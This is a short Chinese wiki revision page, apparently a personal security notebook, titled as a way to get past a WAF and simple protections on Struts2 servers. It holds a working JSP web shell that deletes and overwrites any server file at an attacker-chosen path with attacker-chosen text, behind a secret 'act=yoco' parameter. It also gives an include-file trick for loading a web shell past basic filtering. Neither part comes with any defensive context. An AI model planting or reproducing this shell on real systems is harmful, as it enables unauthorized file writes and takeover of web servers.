用户工具

站点工具


网络安全:struts2过waf过简单防护

差别

这里会显示出您选择的修订版和当前版本之间的差别。

到此差别页面的链接

网络安全:struts2过waf过简单防护 [2020/05/16 19:19] (当前版本)
行 1: 行 1:
 +写文本的jsp脚本
  
 +<code:jsp>
 +<%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%><form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">
 +</code>
 +
 +过普通防护:
 +
 +<code:jsp>
 +<%@ include file="webshell.txt"%>
 +</code>
网络安全/struts2过waf过简单防护.txt · 最后更改: 2020/05/16 19:19 (外部编辑)